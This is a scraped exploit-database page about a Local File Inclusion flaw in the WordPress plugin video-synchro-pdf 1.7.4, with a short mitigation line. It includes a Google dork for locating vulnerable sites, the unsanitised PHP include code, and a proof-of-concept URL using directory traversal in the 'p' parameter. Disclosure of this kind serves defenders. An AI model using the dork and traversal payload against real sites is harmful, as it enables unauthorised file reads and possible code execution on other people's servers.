Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-import-export-lite domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the insert-headers-and-footers domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121
WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion - exploit.company
header-logo
Suggest Exploit
vendor:
video-synchro-pdf
by:
Hassan Khan Yusufzai - Splint3r7
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: video-synchro-pdf
Affected Version From: 1.7.2004
Affected Version To: 1.7.2004
Patch Exists: NO
Related CWE:
CPE: a:wordpress:wordpress_plugin:video-synchro-pdf
Metasploit:
Other Scripts:
Platforms Tested: Firefox
2022

WordPress Plugin video-synchro-pdf 1.7.4 – Local File Inclusion

The WordPress Plugin video-synchro-pdf version 1.7.4 is vulnerable to Local File Inclusion. The vulnerable code is present in the file video-synchro-pdf/reglages/Menu_Plugins/tout.php. The code does not properly validate user input and allows an attacker to include arbitrary files from the local system. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious file path in the 'p' parameter. This will allow the attacker to read the contents of the file and potentially execute arbitrary code.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly validated and sanitized before being used in any file operations.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion
# Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/
# Date: 26-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/video-synchro-pdf/
# Version: 1.7.4
# Tested on: Firefox

# Vulnerable File: video-synchro-pdf/reglages/Menu_Plugins/tout.php

# Vulnerable Code:

```
<?php
if ($_GET['p']<=NULL) {
	include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/index.php');
}else{
	include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/'.$_GET['p'].'.php');
}
```

# Proof of Concept:

http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=
<http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../../../../../etc/index>[LFI]

Contents of index.php: <?php echo "Local file read"; phpinfo(); ?>

Navigation

Suggest Exploit

Services By CQR

cqrsecured